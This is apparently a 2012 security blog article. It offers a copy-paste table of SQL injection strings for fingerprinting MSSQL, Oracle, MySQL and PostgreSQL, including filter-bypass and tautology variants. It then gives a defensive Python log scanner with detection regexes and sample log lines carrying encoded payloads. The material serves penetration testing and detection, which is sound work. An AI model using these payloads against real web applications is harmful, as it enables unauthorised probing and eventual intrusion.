10/03/2012

Database Fingerprinting


SQL Fuzzing

This article introduces an SQL query injection reference, meaning strings that can be used without any modification (a simple copy and paste) in web application SQL fuzzers to perform black box SQL fuzzing (no assumption is made about the back end database). In the following table M means MSSQL, O means Oracle, P means PostgreSQL and My means MySQL.

SQL Injection Strings For Fingerprinting

| Injection string | DB | Note |
|---|---|---|
| `'SELECT @@version --` | M | This injection query works with any instance of SQL Server 2000 or of a later version. |
| `' UNION SELECT @@version,NULL,NULL--` | M | This injection query can be used to identify the number of table columns, their data types and the database version. |
| `'SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY ('productlevel'), SERVERPROPERTY ('edition') --` | M | This query works with any instance of SQL Server 2000 or of a later version. It returns the product version (for example 10.0.1600.22), the product level (for example RTM) and the edition (for example Enterprise). |
| `'1 in (SELECT @@version) --` | M | This query works by trying to provoke a casting error on the encapsulated subquery. |
| `'1 in (CHAR(83) + CHAR(69) + CHAR(76) + CHAR(69) + CHAR(67) + CHAR(84) + CHAR(32) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110)) --` | M | This query uses obfuscation techniques to bypass SQL filters and is not going to work in most cases. |
| `'SELECT/*Place what ever you want*/ @@version --` | M | This is good for bypassing weak SQL filters. |
| `' 1 in (SELECT/*Place what ever you want*/ @@version) --` | M | Again, this is good for bypassing weak SQL filters. |
| `' or @@PACK_RECEIVED-@@PACK_RECEIVED --` | M | The @@PACK_RECEIVED database system variable is used to display a report containing several SQL Server statistics, including packets sent and received. Used in injection points with numerical values. |
| `Injectable'+'Variable --` | M | String concatenation syntax used by the MSSQL database. |
| `'SELECT version FROM v$instance;` | O | You can capture the edition, version and release (32-bit or 64-bit). |
| `'SELECT banner FROM v$version WHERE banner LIKE 'TNS%';` | O | You can capture the edition, version and release in both 32-bit and 64-bit versions. |
| `'SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';` | O | You can capture the edition, version and release in both 32-bit and 64-bit versions. SELECT statements must have a FROM clause in Oracle. |
| `'Injection'\|\|'variable' --` | O | String concatenation syntax used by the Oracle database. When the vulnerable variable is injected this way the web application should behave normally. |
| `SELECT banner FROM v$version WHERE banner LIKE "Oracle Database%";` | O | You can capture the edition, version and release in both 32-bit and 64-bit versions. SELECT statements must have a FROM clause in Oracle. |
| `SELECT @@version #` | My | Again a version injection query. |
| `'Injection' 'variable' #` | My | Again a version injection query (notice the space in the string). |
| `'SELECT /*!32302 12*/ #` | My | This injection string is used for string values (char variables) and should return the number 12. You will get the same response if the MySQL version is higher than 3.23.02. |
| `or /*!32302 12*/ = /*!32302 12*/` | My | This injection string is used for numerical values and is equivalent to `or 1=1` in MSSQL. You will get the same response if the MySQL version is higher than 3.23.02. |
| `' or /*!32302 12*/ = /*!32302 12*/ #` | My | This injection string is used for numerical values and is equivalent to `' or 1=1 --` in MSSQL. You will get the same response if the MySQL version is higher than 3.23.02. |
| `SELECT /*What ever you want to inject*/@@version#` | My | Again used for bypassing SQL data filters. |
| `CONNECTION_ID()-CONNECTION_ID()#` | My | Again for fingerprinting the database in numerical injections. |
| `' SELECT /*!32302 1/0, */ 1/1 FROM existingtablename #` | My | Will throw a division by zero error if the MySQL version is higher than 3.23.02. |
| `' SELECT /*!32302 1/1, */ 1/0 FROM existingtablename #` | My | Will throw a division by zero error if the MySQL version is lower than 3.23.02. |
| `SELECT version()-` | P | Check the comment character. |
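Turning the table around for the defender, as an added example that is not part of the original article: a Python scanner that URL-decodes the query string of each web server access-log line and reports which DBMS family the fingerprinting strings above are probing. The regex signatures, the log-format parser and the sample log lines are constructed for this example and are not from the page.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the table above; the regexes are this example's own assumption.
PROBE_SIGNATURES = {
    "MSSQL": [re.compile(r"@@version", re.I),
              re.compile(r"SERVERPROPERTY\s*\(", re.I),
              re.compile(r"@@PACK_RECEIVED", re.I),
              re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I)],  # CHAR() obfuscation
    "Oracle": [re.compile(r"v\$(version|instance)", re.I)],
    "MySQL": [re.compile(r"/\*!\d{5}"),                               # /*!32302 ... */
              re.compile(r"CONNECTION_ID\s*\(\s*\)", re.I),
              re.compile(r"@@version\s*#", re.I)],                    # also hits the MSSQL rule; both are reported
    "PostgreSQL": [re.compile(r"\bversion\s*\(\s*\)", re.I)],        # MySQL accepts this too
}

# Combined log format (Apache/nginx): client, identd, user, [timestamp], "request", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_probe(value):
    """Return the DBMS families whose fingerprinting strings appear in a query string."""
    # Decode twice so a double-encoded probe (%2527 -> %27 -> ') is still visible.
    decoded = unquote_plus(unquote_plus(value))
    return {dbms for dbms, pats in PROBE_SIGNATURES.items()
            if any(p.search(decoded) for p in pats)}

def scan_access_log(lines):
    """Return (client_ip, request_target, dbms_set) for every request carrying a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        families = classify_probe(m.group("target").partition("?")[2])
        if families:
            hits.append((m.group("ip"), m.group("target"), families))
    return hits

# Constructed sample log lines using RFC 5737 documentation addresses, not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Mar/2012:14:01:55 +0000] "GET /item.php?id=42 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Mar/2012:14:02:11 +0000] "GET /item.php?id=1%27+UNION+SELECT+%40%40version%2CNULL%2CNULL-- HTTP/1.1" 500 512',
    '203.0.113.7 - - [10/Mar/2012:14:02:19 +0000] "GET /item.php?id=1%2527SELECT+banner+FROM+v%2524version%3B HTTP/1.1" 500 498',
    '203.0.113.9 - - [10/Mar/2012:14:03:02 +0000] "GET /item.php?id=1+or+%2F*!32302+12*%2F+%3D+%2F*!32302+12*%2F HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, target, families in scan_access_log(SAMPLE_LOG):
        print(f"{ip} probed {'/'.join(sorted(families))} via {target}")
```

A 500 status paired with a version probe is the strongest signal, since a verbose conversion error is exactly what the MSSQL rows above rely on; the scanner keeps the status in the match so that filter is a one-line addition.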